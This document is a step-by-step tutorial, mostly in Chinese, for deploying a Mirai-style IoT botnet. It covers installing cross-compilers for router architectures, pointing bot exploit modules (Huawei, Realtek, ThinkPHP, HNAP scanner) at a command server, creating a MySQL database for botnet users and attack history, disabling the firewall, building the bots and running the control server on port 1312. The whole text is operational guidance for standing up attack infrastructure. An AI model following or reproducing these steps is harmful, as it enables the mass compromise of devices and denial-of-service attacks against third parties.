------------------------------------------
              ** TUTORIAL *** 
------------------------------------------

// First step compile your vps server  服务器需求:2核，2G，10MBPS (最低)
                                       服务器系统:CentOS7
------------------------------------------
第一步:   复制下面内容粘贴至终端
--------------------------------------------------------------------------------------------------------------------------------------------------------
yum update -y
yum install epel-release -y
yum groupinstall "Development Tools" -y
yum install gmp-devel -y
ln -s /usr/lib64/libgmp.so.3  /usr/lib64/libgmp.so.10
yum install screen wget bzip2 gcc nano gcc-c++ electric-fence sudo git libc6-dev httpd xinetd tftpd tftp-server mysql mysql-server gcc glibc-static -y

mkdir /etc/xcompile
cd /etc/xcompile 
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2
wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2
wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv7l.tar.bz2

tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-m68k.tar.bz2
tar -jxf cross-compiler-mips.tar.bz2
tar -jxf cross-compiler-mipsel.tar.bz2
tar -jxf cross-compiler-powerpc.tar.bz2
tar -jxf cross-compiler-sh4.tar.bz2
tar -jxf cross-compiler-sparc.tar.bz2
tar -jxf cross-compiler-armv4l.tar.bz2
tar -jxf cross-compiler-armv5l.tar.bz2
tar -jxf cross-compiler-armv6l.tar.bz2
tar -jxf cross-compiler-armv7l.tar.bz2
rm -rf *.tar.bz2
mv cross-compiler-i586 i586
mv cross-compiler-m68k m68k
mv cross-compiler-mips mips
mv cross-compiler-mipsel mipsel
mv cross-compiler-powerpc powerpc
mv cross-compiler-sh4 sh4
mv cross-compiler-sparc sparc
mv cross-compiler-armv4l armv4l
mv cross-compiler-armv5l armv5l
mv cross-compiler-armv6l armv6l
mv cross-compiler-armv7l armv7l

cd /tmp
wget https://dl.google.com/go/go1.13.5.linux-amd64.tar.gz
tar -xzf go1.13.5.linux-amd64.tar.gz
mv go /usr/local
export GOROOT=/usr/local/go
export GOPATH=$HOME/Projects/Proj1
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
go version
go env
cd ~/

--------------------------------------------------------------------------------------------------------------------------------------------------------

第二步:
更改这些文件中的ip
-----------------------------------------
 CHANGE IP(s) IN /bot/includes.h
 CHANGE IP(s) IN /bot/huawei.c
 CHANGE IP(s) IN /bot/realtek.c
 CHANGE IP(s) IN /bot/thinkphp.c
 CHANGE IP(s) IN /bot/hnap_scanner.c
 CHANGE IP(s) IN /dlr/main.c -> For example your server ip is 127.0.0.1 the format should be (127,0,0,1) replace the . with , 
 CHANGE IP(s) IN /loader/src/main.c
 CHANGE IP(s) IN /loader/src/headers/config.h

------------------------------------------

第三步:
上传全部文件

第四步: 安装数据库(复制粘贴即可)
---------------------------------------

yum install mariadb-server
systemctl start mariadb.service
mysql_secure_installation

(密码设置为与/cnc/main.go  中的密码一致)
------------------------------------------

第五步:  登录数据库

mysql -p123456

复制粘贴下面这些指令

--------------------------------------------------------------------------------------------------

CREATE DATABASE Bomba;
use Bomba;
CREATE TABLE `history` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int(10) unsigned NOT NULL,
  `time_sent` int(10) unsigned NOT NULL,
  `duration` int(10) unsigned NOT NULL,
  `command` text NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
);
 
CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `username` varchar(32) NOT NULL,
  `password` varchar(32) NOT NULL,
  `duration_limit` int(10) unsigned DEFAULT NULL,
  `cooldown` int(10) unsigned NOT NULL,
  `wrc` int(10) unsigned DEFAULT NULL,
  `last_paid` int(10) unsigned NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  `admin` int(10) unsigned DEFAULT '0',
  `apiacc` int(10) unsigned DEFAULT '0',
  `intvl` int(10) unsigned DEFAULT '30',
  `api_key` int(10) unsigned DEFAULT '0',
  PRIMARY KEY (`id`),
  KEY `username` (`username`)
);
 
CREATE TABLE `whitelist` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `prefix` varchar(16) DEFAULT NULL,
  `netmask` tinyint(3) unsigned DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `prefix` (`prefix`)
);
INSERT INTO users VALUES (NULL, '登录僵尸网络的账号', '登录僵尸网络的密码', 0, 0, 0, 0, -1, 1, 1, 30, '');
exit;

---------------------------------------------------------------------------------------------------------

第六步:  复制粘贴至终端即可

------------------------------------------

service iptables stop 
service httpd restart  
service mysqld restart

------------------------------------------

第七步:  

nano /usr/include/bits/typesizes.h
复制上面那条命令然后回车，一直往下翻，找到有个1024的数字，将他改为999999
更改完成后Ctrl+X 保存退出即可，然后执行下面的这条命令

ulimit -n999999; ulimit -u999999; ulimit -e999999

------------------------------------------

第八步:   复制粘贴即可

cd ~/
chmod 0777 * -R
sh build.sh

第九步:
cd /cnc 
screen ./command-line-arguments

CTRL+AD
现在用putty连接端口: 1312

------------------------------------------

查看你的payload:

python payload.py










